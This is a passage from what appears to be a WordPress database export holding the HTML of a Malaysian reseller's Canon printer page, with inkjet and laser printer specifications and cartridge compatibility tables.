width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 09:08:46','2019-09-25 01:08:46','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3320,1,'2019-09-25 08:58:32','2019-09-25 00:58:32','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<p>Â </p><table border=\"1\" width=\"378\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td><td>Maintenance Cartridge MC-20</td></tr><tr><td>PFI-50 (Blue)</td></tr><tr><td>PFI-50 (Chroma Optimizer)</td></tr><tr><td>PFI-50 (Cyan)</td></tr><tr><td>PFI-50 (Gray)</td></tr><tr><td>PFI-50 (Magenta)</td></tr><tr><td>PFI-50 (Matte Black)</td></tr><tr><td>PFI-50 (Photo Black)</td></tr><tr><td>PFI-50 (Photo Cyan)</td></tr><tr><td>PFI-50 (Photo Gray)</td></tr><tr><td>PFI-50 (Photo Magenta)</td></tr><tr><td>PFI-50 (Red)</td></tr><tr><td>PFI-50 (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E3170</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E410</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr></tbody></table><p>Â </p><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E4270</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E470</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E477</td><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E480</td><td>CL-57 (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E510</td><td>CL-98 (Colour)</td></tr><tr><td>PG-88 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E560</td><td>CL-99 (Colour)</td></tr><tr><td>PG-89 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td><td>CL-99 (Colour)</td></tr><tr><td>PG-89 (Pigment Black)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G1000</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G1010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G2010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G3000</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G3010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G4010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP100</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP110</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA iP1300</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td 